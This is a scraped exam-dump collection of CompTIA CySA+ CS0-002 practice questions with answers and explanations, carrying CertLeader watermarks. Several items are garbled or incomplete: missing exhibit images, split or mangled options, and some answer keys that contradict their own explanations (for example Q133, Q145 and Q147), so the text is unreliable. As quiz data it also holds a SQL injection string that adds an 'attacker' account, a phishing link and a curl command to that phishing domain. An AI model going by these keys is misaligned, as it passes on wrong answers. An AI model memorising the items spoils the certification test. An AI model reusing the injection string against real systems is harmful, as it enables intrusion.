D. improve existing detection capabilities.

Answer: D

Explanation:
The analyst decided to include a custom lookup for these files on the endpoint’s log-in script as a mechanism to improve existing detection capabilities, by
checking if any of these files are present on the endpoints during log-in. This can help identify any compromised endpoints that may have been infected by the
zero-day vulnerability, and alert the analyst for further investigation or response.

NEW QUESTION 86
A cybersecurity analyst is supporting an Incident response effort via threat Intelligence Which of the following is the analyst most likely executing?

A. Requirements analysis and collection planning


B. Containment and eradication
C. Recovery and post-incident review
D. Indicator enrichment and research pivoting

Answer: D

Explanation:
Indicator enrichment and research pivoting are steps in the threat intelligence process that involve gathering additional information and context about the indicators
of compromise (IoCs) that are related to an incident, and using them to identify other potential sources of threat data or evidence. For example, an analyst can
enrich an IoC such as an IP address by looking up its geolocation, reputation, or associated domains, and then pivot to other sources of threat intelligence that
may have more information about the IP address or its activities.

NEW QUESTION 87
An organization completed an internal assessment of its policies and procedures. The audit team identified a deficiency in the policies and procedures for PH.
Which of the following should be the first step to secure the organization's Pll?

A. Complete Pll training within the organization.


B. Contact all Pll data owners within the organization.
C. Identify what type of Pll is on the network.
D. Formalize current Pll documentation.

Answer: C

Explanation:
Pll stands for Personally Identifiable Information, and it is any data that can be used to identify, locate, or contact an individual. Examples of Pll include names,
addresses, phone numbers, email addresses, social security numbers, bank account numbers, etc. The first step to secure the organization’s Pll is to identify what
type of Pll is on the network, where it is stored, who has access to it, and how it is transmitted. This can help determine the scope and impact of the deficiency in
the policies and procedures for Pll.

NEW QUESTION 90
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from
its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party
service provider meets this requirement?

A. Implement a secure supply chain program with governance.


B. Implement blacklisting lor IP addresses from outside the county.
C. Implement strong authentication controls for at contractors.
D. Implement user behavior analytics tor key staff members.

Answer: A

Explanation:
A secure supply chain program is a set of processes and practices that aim to protect the supply chain from various risks, such as cyberattacks, data breaches,
fraud, theft, sabotage, or natural disasters1. A secure supply chain program can help to ensure the integrity, availability, and confidentiality of the products,
services, data, and systems involved in the supply chain. A secure supply chain program with governance means that there are clear roles, responsibilities,
policies, procedures, and controls for managing the security of the supply chain. This can help to monitor and enforce the compliance of the third-party service
provider with the requirement to source talent from its own country. A secure supply chain program with governance can also help to identify and mitigate any
potential threats or vulnerabilities in the supply chain. Implementing blacklisting for IP addresses from outside the country (B) may not be sufficient or effective, as
IP addresses can be spoofed or bypassed by attackers. Implementing strong authentication controls for all contractors © may not be relevant or adequate, as
authentication controls do not prevent the sourcing of talent from other countries. Implementing user behavior analytics for key staff members (D) may not be
applicable or useful, as user behavior analytics do not verify the origin or location of the talent.

NEW QUESTION 94
A security analyst is reviewing the following Internet usage trend report:

Which of the following usernames should the security analyst investigate further?

A. User1
B. User 2

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

C. User 3
D. User 4

Answer: D

Explanation:
The Internet usage trend report shows that User 4 has an unusually high amount of data downloaded compared to other users. User 4 downloaded 2.5 GB of data
in one day, while the average data downloaded by other users was around 0.2 GB. This could indicate that User 4 is engaged in some suspicious or malicious
activity, such as downloading unauthorized or illegal content, exfiltrating sensitive data, or installing malware. Therefore, the security analyst should investigate
User 4 further to determine the nature and source of the data downloaded.

NEW QUESTION 96
During an audit several customer order forms were found to contain inconsistencies between the actual price of an item and the amount charged to the customer
Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products Which of the following
would be the BEST way to locate this issue?

A. Reduce the session timeout threshold


B. Deploy MFA for access to the web server
C. Implement input validation
D. Run a static code scan

Answer: C

Explanation:
In this scenario, the issue is related to manipulation of the public-facing web form, indicating that attackers might be altering the prices before submitting the form.
One of the best ways to prevent such attacks is to implement input validation, which can help ensure that the data submitted to the web form is correct, complete,
and in the expected format. Input validation can also help prevent SQL injection and other types of web-based attacks.

NEW QUESTION 97
An incident response plan requires systems that contain critical data to be triaged first in the event of a compromise. Which of the following types of data would
most likely be classified as critical?

A. Encrypted data
B. data
C. Masked data
D. Marketing data

Answer: B

Explanation:
PII stands for personally identifiable information, and it is any data that can be used to identify, contact, or locate a specific individual, such as name, address,
phone number, email, social security number, or biometric data. PII data is considered critical because it can be used by attackers to commit identity theft, fraud, or
other crimes. PII data is also subject to various laws and regulations that require organizations to protect it from unauthorized access, use, or disclosure1.

NEW QUESTION 98
A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an endpoint device. The security analyst then identifies the
following additional details:
• Bursts of network utilization occur approximately every seven days.
• The content being transferred appears to be encrypted or obfuscated.
• A separate but persistent outbound TCP connection from the host to infrastructure in a third-party cloud is in place.
• The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.
• Single file sizes are 10GB.
Which of the following describes the most likely cause of the issue?

A. Memory consumption
B. Non-standard port usage
C. Data exfiltration
D. System update
E. Botnet participant

Answer: C

Explanation:
data exfiltration is the unauthorized transfer of data from an organization’s network to an external destination, usually for malicious purposes such as espionage,
sabotage, or theft. The details given in the question suggest that data exfiltration is occurring from an endpoint device. The bursts of network utilization every
seven days indicate periodic data transfers. The content being transferred appears to be encrypted or obfuscated to avoid detection or analysis. The persistent
outbound TCP connection from the host to infrastructure in a third-party cloud indicates a possible command and control channel for an attacker. The HDD
utilization on the device grows by 10GB to 12GB over the course of every seven days, and single file sizes are 10GB, indicating that large amounts of data are
being collected and compressed before being exfiltrated.

NEW QUESTION 101


During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into
consideralion Wtiich of the following are part of a known threat modeling method?

A. Threat profile, infrastructure and application vulnerabilities, security strategy and plans
B. Purpose, objective, scope, (earn management, cost, roles and responsibilities
C. Spoofing tampering, repudiation, information disclosure, denial of service elevation of privilege
D. Human impact, adversary's motivation, adversary's resources, adversary's methods

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Answer: C

Explanation:
Spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege are part of a known threat modeling method called STRIDE.
STRIDE is a mnemonic that stands for six categories of threats that can affect the security of a system or application. STRIDE was developed by Microsoft in 1999
and has been widely adopted as a threat modeling method by many organizations. STRIDE can help identify and prioritize potential threats based on their impact
and likelihood1.

NEW QUESTION 102


A security technician is testing a solution that will prevent outside entities from spoofing the company's email domain, which is compatia.org. The testing is
successful, and the security technician is prepared to fully implement the solution. Which of the following actions should the technician take to accomplish this
task?

A. Add TXT @ "v=spfl mx include:_spf.compti


B. org -all" to the DNS record.
C. Add : XT @ "v=spfl mx include:_sp£.comptia.org -all" to the email server.
D. Add TXT @ "v=spfl mx include:_sp£.comptia.org +all" to the domain controller.
E. AddTXT @ "v=apfl mx lnclude:_spf .comptia.org +a 11" to the web server.

Answer: A

Explanation:
Adding TXT @ “v=spfl mx include:_spf.comptia. org -all” to the DNS record can help to prevent outside entities from spoofing the company’s email domain, which
is comptia.org. This is an example of a Sender Policy Framework (SPF) record, which is a type of DNS record that specifies which mail servers are authorized to
send email on behalf of a domain. SPF records can help to prevent spoofing by allowing the recipient mail servers to check the validity of the sender’s domain
against the SPF record. The “-all” at the end of the SPF record indicates that any mail server that is not listed in the SPF record is not authorized to send email for
comptia.org .

NEW QUESTION 107


An incident response team is responding to a breach of multiple systems that contain Pll and PHI Disclosure of the incident to external entities should be based on:

A. the responder's discretion.


B. the public relations policy.
C. the communication plan.
D. the senior management team's guidance.

Answer: C

Explanation:
The communication plan is an important part of incident response, as it outlines how and when information about the incident should be shared with external
entities.
A communication plan is a set of procedures and protocols that define how an organization should communicate with external entities during times of emergency
or security incident. The plan typically outlines how and when information about the incident should be shared, and ensures that any relevant stakeholders are
informed of the incident in a timely manner. It also serves as a guide for determining what information to share with outside parties. Here is a link to an article from
CompTIA's website about the importance of a communication plan for incident response for your reference:
https://www.comptia.org/content/incident-response-communication-plan

NEW QUESTION 108


A user receives a potentially malicious attachment that contains spelling errors and a PDF document. A security analyst reviews the email and decides to
download the attachment to a Linux sandbox for review. Which of the following commands would most likely indicate if the email is malicious?

A. sha256sum ~/Desktop/fi1e.pdf
B. /bin/;s -1 ~/Desktop/fi1e.pdf
C. strings ~/Desktop/fi1e.pdf | grep -i “<script”
D. cat < ~/Desktop/file.pdf | grep —i .exe

Answer: C

Explanation:
This command would most likely indicate if the email attachment is malicious, as it would display any JavaScript code embedded in the PDF file. JavaScript code
can be used by attackers to execute malicious commands or scripts on the victim’s system when the PDF file is opened1. The strings command extracts the
printable characters from a binary file, such as a PDF file, and the grep -i “<script” option searches for the presence of JavaScript code in a case-insensitive
manner2.

NEW QUESTION 113


A technician working at company.com received the following email:

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

After looking at the above communication, which of the following should the technician recommend to the security team to prevent exposure of sensitive
information and reduce the risk of corporate data being stored on non-corporate assets?

A. Forwarding of corporate email should be disallowed by the company.


B. A VPN should be used to allow technicians to troubleshoot computer issues securely.
C. An email banner should be implemented to identify emails coming from external sources.
D. A rule should be placed on the DLP to flag employee IDs and serial numbers.

Answer: C

Explanation:
An email banner is a message that is added to the top or bottom of an email to provide some information or
warning to the recipient. An email banner should be implemented to identify emails coming from external sources to prevent exposure of sensitive information and
reduce the risk of corporate data being stored on
non-corporate assets. An email banner can help employees recognize phishing or spoofing attempts and avoid clicking on malicious links or attachments. It can
also remind employees not to share confidential information with external parties or forward corporate emails to personal accounts. The other options are not
relevant or effective for this purpose. References: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 13;
https://www.csoonline.com/article/3235970/what-is-spoofing-definition-and-how-to-prevent-it.html

NEW QUESTION 114


An employee observes degraded system performance on a Windows workstation. While attempting to access documents, the employee notices the file icons
appear abnormal and the file extensions have been changed. The employee instantly shuts down the machine and alerts a supervisor.
Which of the following forensic evidence will be lost as a result of these actions?

A. All user actions prior to shutting down the machine


B. All information stored in the machine's local database
C. All cached items that are queued to be written to the registry
D. Volatile artifacts in the system's memory

Answer: D

Explanation:
Volatile artifacts are data that is stored in a computer’s volatile memory while it is running, such as open network connections, running processes, encryption keys,
and internet history. Volatile artifacts can provide
valuable evidence for forensic investigations, especially for detecting and analyzing malware or malicious activities that do not leave traces on the hard drive.
However, volatile artifacts are wiped off the system’s memory once the power is turned off, so they cannot be recovered later

NEW QUESTION 116


A security analyst needs to recommend the best approach to test a new application that simulates abnormal user behavior to find software bugs. Which of the
following would best accomplish this task?

A. A static analysis to find libraries with flaws handling user inputs


B. A dynamic analysis using a dictionary to simulate user inputs
C. Reverse engineering to circumvent software protections
D. Fuzzing tools with polymorphic methods

Answer: D

Explanation:
Fuzzing is a technique that involves sending random, malformed, or unexpected inputs to an application to trigger errors, crashes, or vulnerabilities. Fuzzing can
be used to test the robustness and security of software, especially when the source code is not available or the input format is complex1. Fuzzing can also
simulate abnormal user behavior, such as entering invalid data, clicking on random buttons, or sending malicious requests2.
Fuzzing tools are software programs that automate the process of generating and sending inputs to the application under test. There are different types of fuzzing
tools, such as black-box fuzzers, white-box fuzzers, and grey-box fuzzers, depending on the level of information and feedback they have about the application1.
Some examples of fuzzing tools are AFL, Peach, and [Sulley].
Polymorphic methods are techniques that allow fuzzing tools to modify or mutate the inputs in different ways, such as changing the length, value, type, or structure
of the data. Polymorphic methods can increase the diversity and effectiveness of the inputs and help discover more bugs or vulnerabilities in the application .
Therefore, using fuzzing tools with polymorphic methods would be the best approach to test a new application that simulates abnormal user behavior to find
software bugs. This approach would generate a large number of inputs that cover various scenarios and edge cases and expose any flaws or weaknesses in the
application’s functionality or security.

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

NEW QUESTION 117


A security analyst notices the following entry while reviewing the server togs OR 1=1' ADD USER attacker' PW 1337password' ---Which of the following events
occurred?

A. CSRF
B. XSS
C. SQLi
D. RCE

Answer: C

Explanation:
SQLi stands for SQL injection, which is a type of attack that injects malicious SQL statements into a web application’s input fields or parameters. The attacker can
use SQLi to execute unauthorized commands on the database server, such as adding a new user or retrieving sensitive data. The entry in the server logs shows
an example of a SQLi attack that tries to add a new user named attacker with the password 1337password. CSRF, XSS, and RCE are other types of attacks, but
they do not match the description of the entry in the server logs. Reference: https://owasp.org/www-community/attacks/SQL_Injection

NEW QUESTION 118


Given the Nmap request below:

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection

Answer: C

Explanation:
The Nmap command given in the question performs a TCP SYN scan (-sS), a service version detection scan (-sV), an OS detection scan (-O), and a port scan for
ports 1-1024 (-p 1-1024) on the host 192.168.1.1. This command will reveal information about the host’s operating system, open ports, and running services,
which can be used by an attacker to launch a brute-force attack against the host. A brute-force attack is a method of guessing passwords or encryption keys by
trying many possible combinations until finding the correct one. An attacker can use the information from the Nmap scan to target specific services or protocols
that may have weak or default credentials, such as FTP, SSH, Telnet, or HTTP.

NEW QUESTION 122


Which of the following can detect vulnerable third-parly libraries before code deployment?

A. Impact analysis
B. Dynamic analysis
C. Static analysis
D. Protocol analysis

Answer: C

Explanation:
Static analysis is a method of analyzing the source code or binary code of an application without executing
it. Static analysis can detect vulnerable third-party libraries before code deployment by scanning the code for references to known vulnerable libraries or versions
and reporting any issues or risks12.
Impact analysis is a process of assessing the potential effects of a change on a system or service, such as performance, availability, security and compatibility.
Impact analysis does not detect vulnerable third-party libraries before code deployment, but rather helps to evaluate and communicate the consequences of a
change.

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Dynamic analysis is a method of analyzing the behavior or performance of an application by executing it under various conditions or inputs. Dynamic analysis does
not detect vulnerable third-party libraries before code deployment, but rather helps to identify any errors or defects that occur at runtime.
Protocol analysis is a method of examining the data exchanged between devices or applications over a network by capturing and interpreting the packets or
messages. Protocol analysis does not detect vulnerable third-party libraries before code deployment, but rather helps to monitor and troubleshoot network
communication.

NEW QUESTION 126


An organization has the following policy statements:
• AlI emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized coolant.
•AM network activity will be logged and monitored.
• Confidential data will be tagged and tracked
• Confidential data must never be transmitted in an unencrypted form.
• Confidential data must never be stored on an unencrypted mobile device. Which of the following is the organization enforcing?

A. Acceptable use policy


B. Data privacy policy
C. Encryption policy
D. Data management, policy

Answer: B

Explanation:
Data privacy policy is the organization’s policy that defines how it collects, uses, stores, and shares personal data of its customers, employees, or other
stakeholders. Data privacy policy also covers how the organization complies with relevant data protection laws and regulations, such as the General Data
Protection Regulation (GDPR) or the California Consumer Privacy Act (CCPA). The policy statements listed in the question are examples of data privacy policy
provisions that aim to protect the confidentiality, integrity, and availability of personal data.

NEW QUESTION 130


A security administrator needs to provide access from partners to an Isolated laboratory network inside an organization that meets the following requirements:
• The partners' PCs must not connect directly to the laboratory network.
• The tools the partners need to access while on the laboratory network must be available to all partners
• The partners must be able to run analyses on the laboratory network, which may take hours to complete Which of the following capabilities will MOST likely meet
the security objectives of the request?

A. Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
B. Deployment of a firewall to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools tor analysis
C. Deployment of a firewall to allow access to the laboratory network and use of VDI In persistent mode to provide the necessary tools for analysis
D. Deployment of a jump box to allow access to the Laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis

Answer: D

Explanation:
A jump box is a system that is connected to two networks and acts as a gateway or intermediary between them 1. A jump box can help to isolate and secure a
network by limiting the direct access to it from other networks.
A jump box can also help to monitor and audit the traffic and activity on the network. A VDI (Virtual Desktop
Infrastructure) is a technology that allows users to access virtual desktops that are hosted on a server2. A VDI can help to provide users with the necessary tools
and applications for analysis without installing them on their own PCs. A VDI can also help to reduce the maintenance and management costs of the desktops. A
VDI can operate in two modes: persistent and non-persistent. In persistent mode, each user has a dedicated virtual desktop that retains its settings and data
across sessions. In non-persistent mode, each user has a temporary virtual desktop that is deleted or reset after each session3. In this scenario, deploying a jump
box to allow access to the laboratory network and using VDI in non-persistent mode can meet the security objectives of the request. The jump box can prevent the
partners’ PCs from connecting directly to the laboratory network and reduce the risk of unauthorized access or compromise. The VDI in non-persistent mode can
provide the necessary tools for analysis without storing any data on the partners’ PCs or the virtual desktops. The VDI in non-persistent mode can also allow the
partners to run long analyses without losing their progress or results. Deploying a firewall (B) may not be sufficient or effective, as a firewall only filters or blocks
traffic based on rules and does not provide access or tools for analysis. Using VDI in persistent mode (A) © may not be secure or efficient, as persistent mode
stores data on the virtual desktops that may be sensitive or confidential.
References: 1: https://www.techrepublic.com/article/jump-boxes-vs-firewalls/ 2:
https://www.techopedia.com/definition/26139/virtual-desktop-infrastructure-vdi 3: https://www.techopedia.com/definition/31686/resource-exhaustion

NEW QUESTION 131


A forensic examiner is investigating possible malware compromise on an active endpoint device. Which of the following steps should the examiner perform first?

A. Verify the hash value of the image with the value of the copy.
B. Use a write blocker to create an image of the hard drive.
C. Create a memory dump from RAM.
D. Download and apply the latest AV signature.
E. Reimage the hard drive and apply the latest updates.

Answer: C

Explanation:
A memory dump is a snapshot of the contents of the random access memory (RAM) of a system at a given
point in time. A memory dump can provide valuable information for a forensic examiner who is investigating possible malware compromise on an active endpoint
device, such as running processes, open files, network connections, encryption keys, or malware artifacts. Creating a memory dump from RAM should be the first
step that the examiner performs, as it preserves the volatile data that could be lost or altered if the system is powered off or rebooted1.

NEW QUESTION 133


An organization is performing a risk assessment to prioritize resources for mitigation and remediation based on impact. Which of the following metrics, in addition
to the CVSS for each CVE, would best enable the organization to prioritize its efforts?

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A. OS type
B. OS or application versions
C. Patch availability
D. System architecture
E. Mission criticality

Answer: C

Explanation:
A risk assessment is a process of identifying, analyzing, and evaluating the potential threats and vulnerabilities that may affect an organization’s assets,
operations, or objectives. A risk assessment matrix is a tool that can help prioritize the risks based on their likelihood and impact1.
The CVSS (Common Vulnerability Scoring System) is a standard framework for rating the severity of vulnerabilities in software systems. The CVSS provides a
numerical score from 0 to 10, as well as a qualitative rating from Low to Critical, based on the characteristics and consequences of the vulnerability2.
However, the CVSS score alone may not be sufficient to determine the priority of mitigation and remediation actions for each vulnerability. Other factors that may
influence the decision include:
Patch availability: This metric indicates whether there is a fix or update available for the vulnerability from the vendor or developer. Patch availability can affect
the urgency and feasibility of remediation, as well as the risk exposure and potential damage of exploitation. For example, a vulnerability with a high CVSS score
but with a readily available patch may be less critical than a vulnerability with a lower CVSS score but with no patch available3.
Mission criticality: This metric reflects the importance and value of the asset or system affected by the vulnerability to the organization’s mission, goals, or
functions. Mission criticality can affect the impact and priority of remediation, as well as the risk tolerance and acceptance level of the organization. For example, a
vulnerability with a high CVSS score but affecting a non-essential system may be less critical than a vulnerability with a lower CVSS score but affecting a core
system4.
OS type: This metric indicates the operating system (OS) of the asset or system affected by the vulnerability. OS type can affect the likelihood and complexity
of exploitation, as well as the availability and compatibility of patches or mitigations. For example, a vulnerability with a high CVSS score but affecting an
uncommon or unsupported OS may be less critical than a vulnerability with a lower CVSS score but affecting a widely used or supported OS3.
OS or application versions: This metric indicates the specific version of the OS or application affected by the vulnerability. OS or application versions can affect
the applicability and relevance of the vulnerability, as well as the availability and compatibility of patches or mitigations. For example, a vulnerability with a high
CVSS score but affecting an outdated or obsolete version may be less critical than a vulnerability with a lower CVSS score but affecting a current or popular
version3.
System architecture: This metric indicates the design and configuration of the asset or system affected by the vulnerability. System architecture can affect the
exposure and accessibility of the vulnerability, as well as the effectiveness and efficiency of patches or mitigations. For example, a vulnerability with a high CVSS
score but affecting an isolated or segmented system may be less critical than a vulnerability with a lower CVSS score but affecting an interconnected or integrated
system3.
Therefore, to best enable the organization to prioritize its efforts based on impact, patch availability is one of the most important metrics to consider in addition to
the CVSS score for each CVE (Common Vulnerabilities and Exposures). Patch availability can directly influence the risk level and remediation strategy for each
vulnerability.

NEW QUESTION 137


A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security analyst with
finding the proper control functions to verify that a user's data is not altered without the user's consent. Which of the following would be an appropriate course of
action?

A. Automate the use of a hashing algorithm after verified users make changes to their data.
B. Use encryption first and then hash the data at regular, defined times.
C. Use a DLP product to monitor the data sets for unauthorized edits and changes.
D. Replicate the data sets at regular intervals and continuously compare the copies for unauthorized changes.

Answer: A

Explanation:
Automating the use of a hashing algorithm after verified users make changes to their data is an appropriate course of action to verify that a user’s data is not
altered without the user’s consent. Hashing is a technique that produces a unique and fixed-length value for a given input, such as a file or a message. Hashing
can help to verify the data integrity by comparing the hash values of the original and modified data. If the hash values match, then the data has not been altered
without the user’s consent. If the hash values differ, then the data may have been tampered with or corrupted .

NEW QUESTION 142


A company's application development has been outsourced to a third-party development team. Based on the SLA. The development team must follow industry
best practices for secure coding. Which of the following is the BEST way to verify this agreement?

A. Input validation
B. Security regression testing
C. Application fuzzing
D. User acceptance testing
E. Stress testing

Answer: B

Explanation:
Detailed
Security regression testing is a type of testing that verifies that the security features and functionality of an application are not compromised or broken by any
changes or updates in the code2. Security regression testing can help to ensure that the application follows industry best practices for secure coding and does not
introduce any new vulnerabilities or weaknesses. Security regression testing can be performed manually or automatically using tools or scripts that check for
common security flaws and compliance with security standards. Security regression testing can also help to validate the error-handling capabilities of an
application by testing how it responds to different types of inputs and scenarios. Input validation (A) is a technique that checks whether the inputs to an application
are valid and expected before processing them3. Input validation can help to prevent some types of security attacks, such as injection attacks or buffer overflows,
but it is not a way to verify that an application follows industry best practices for secure
coding. Input validation is part of secure coding, not a way to test it. Application fuzzing © is a technique that tests an application by sending random or malformed
inputs to it and observing its behavior4. Application fuzzing can help to discover some types of security vulnerabilities, such as memory leaks or crashes, but it is
not a comprehensive way to verify that an application follows industry best practices for secure coding. Application fuzzing may not cover all possible inputs and

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

scenarios and may not check for compliance with security standards. User acceptance testing (D) is a technique that tests an application by involving end users or
customers in evaluating its functionality and usability. User acceptance testing can help to ensure that an application meets the user requirements and
expectations, but it is not a reliable way to verify that an application follows industry best practices for secure coding. User acceptance testing may not focus on
security aspects and may not detect subtle or hidden security flaws. Stress testing (E) is a technique that tests an application by subjecting it to high levels of load
or demand. Stress testing can help to evaluate the performance and reliability of an application under extreme conditions, but it is not a relevant way to verify that
an application follows industry best practices for secure coding. Stress testing does not check for security issues and may not reflect normal usage patterns.
References: 2: https://www.techopedia.com/definition/31686/resource-exhaustion 3:
https://www.techopedia.com/definition/13493/penetration-testing 4: https://www.techopedia.com/definition/25888/security-development-lifecycle-sdl :
https://www.techopedia.com/definition/24771/technical-controls : https://www.techopedia.com/definition/32088/vm-escape

NEW QUESTION 145


A security analyst is investigating a reported phishing attempt that was received by many users throughout the company The text of one of the emails is shown
below:

Office 365 User.


It looks like you account has been locked out Please click this <a href=Tittp7/accountfix-office356 com/login php">link</a> and follow the pfompts to restore access
Regards. Security Team
Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network traffic, but rt
does log network flow data Which of the following commands will the analyst most likely execute NEXT?

A. telnet office365.com 25
B. tracert 122.167.40.119
C. curl http:// accountfix-office365.com/logi
D. php
E. nslookup accountfix-office365.com

Answer: D

Explanation:
nslookup is a command-line tool that can query the Domain Name System (DNS) and display information about domain names and IP addresses. The security
analyst can use nslookup to find out the IP address of the malicious domain accountfix-office365.com that was used in the phishing attempt. This could help the
analyst to block or trace the source of the attack. telnet, tracert, and curl are other command-line tools, but they are not as useful as nslookup for investigating a
phishing attempt based on a domain name. Reference: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup

NEW QUESTION 147


In web application scanning, static analysis refers to scanning:

A. the system for vulnerabilities before installing the application.


B. the compiled code of the application to detect possible issues.
C. an application that is installed and active on a system.
D. an application that is installed on a system that is assigned a static IP.

Answer: B

Explanation:
This type of analysis is performed before the application is installed and active on a system, and it involves
examining the code without actually executing it in order to identify potential vulnerabilities or security risks.
As per CYSA+ 002 Study Guide: Static analysis is conducted by reviewing the code for an application. Static analysis does not run the program; instead, it focuses
on understanding how the program is written and what the code is intended to do.
Static analysis refers to scanning the source code or the compiled code of an application without executing it, to identify potential vulnerabilities, errors, or bugs.
Static analysis can help improve the quality and security of the code before it is deployed or run4

NEW QUESTION 151


Which of the following is the best method to review and assess the security of the cloud service models used by a company on multiple CSPs?

A. Unifying and migrating all services in a single CSP


B. Executing an API hardening process on the CSPs' endpoints
C. Integrating the security benchmarks of the CSPs with a CASB
D. Deploying cloud instances using Nikto and OpenVAS

Answer: C

Explanation:
This is the best method to review and assess the security of the cloud service models used by a company on multiple CSPs. CSP stands for cloud service
provider, which is a company that offers cloud-based services such as infrastructure, platform, or software. CASB stands for cloud access security broker, which is
a software or service that acts as a gateway between the company and the CSPs, and provides visibility, control, compliance, and threat protection for the cloud
services.
Integrating the security benchmarks of the CSPs with a CASB means that the company can use a common set of standards and metrics to measure and compare
the security posture and performance of different cloud service models, such as IaaS, PaaS, or SaaS. Security benchmarks are predefined criteria or best
practices that define the minimum level of security required for a cloud service model. For example, some security benchmarks may include encryption,

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

authentication, logging, auditing, patching, backup, etc. By integrating these benchmarks with a CASB, the company can monitor and enforce them across multiple
CSPs, and identify any gaps or risks in their cloud security.

NEW QUESTION 156


The IT department is concerned about the possibility of a guest device infecting machines on the corporate network or taking down the company's singe internet
connection. Which of the following should a security analyst recommend to BEST meet the requirements outlined by the IT Department?

A. Require the guest machines to install the corporate-owned EDR solution.


B. Configure NAC to only allow machines on the network that are patched and have active antivirus.
C. Place a firewall In between the corporate network and the guest network
D. Configure the IPS with rules that will detect common malware signatures traveling from the guest network.

Answer: C

Explanation:
A firewall is a device or software that monitors and controls incoming and outgoing network traffic based on predefined rules or policies. A firewall can help prevent
unauthorized or malicious traffic from entering or leaving a network, and protect network resources from external threats. Placing a firewall in between the
corporate network and the guest network can help prevent a guest device from infecting machines on the corporate network or taking down the company’s single
internet connection, as it can block or filter any unwanted or harmful traffic from the guest network.

NEW QUESTION 157


A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?
A)

B)

C)

D)

A. Option A
B. Option B
C. Option C
D. Option D

Answer: C

Explanation:
Option C shows a device that can perform a forensic copy of a hard drive. A forensic copy, also known as a forensic image or a bit-stream image, is an exact,
unaltered digital copy of a piece of digital evidence. A forensic copy captures everything on the hard drive, including active and latent data, and preserves the
integrity of the original evidence. A forensic copy can be used for forensic analysis without risking any changes to the original drive1. Option C shows a device that
can connect to two hard drives and create a
forensic copy from one drive to another using a write-blocker. A write-blocker is a tool that prevents any data from being written to the destination drive, ensuring
that only a read-only copy is made2.

NEW QUESTION 159


A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the
following BEST describes a solution that would apply and cause fewer issues during the deployment phase?

A. Implement port security with one MAC address per network port of the switch.
B. Deploy network address protection with DHCP and dynamic VLANs.
C. Configure 802.1X and EAPOL across the network
D. Implement software-defined networking and security groups for isolation

Answer: A

Explanation:
The security analyst should implement port security with one MAC address per network port of the switch. This will help prevent possible physical attacks on the
network access layer, such as MAC flooding or MAC spoofing. Port security is a feature that allows a switch to limit the number of MAC addresses that can be
learned on a specific port. By setting the limit to one MAC address per port, the switch will only allow traffic from the device that is connected to that port, and drop
any traffic from other devices that try to use that
port. This will prevent attackers from connecting unauthorized devices to the network or impersonating
legitimate devices by changing their MAC addresses3.

NEW QUESTION 164


A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:

A. output encoding.
B. data protection.
C. query parameterization.
D. input validation.

Answer: A

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Explanation:
Output encoding is a technique that converts user-generated input in a web form before it is displayed by the browser. Output encoding is a form of data
sanitization that prevents cross-site scripting (XSS) attacks, which occur when malicious scripts are injected into web pages and executed by unsuspecting users4.
Output encoding works by replacing special characters in user input, such as <, >, ", ', &, etc., with their
HTML-encoded equivalents, such as <, >, ", ', &, etc. This prevents the browser from interpreting the user input as HTML or JavaScript code and executing it.

NEW QUESTION 168


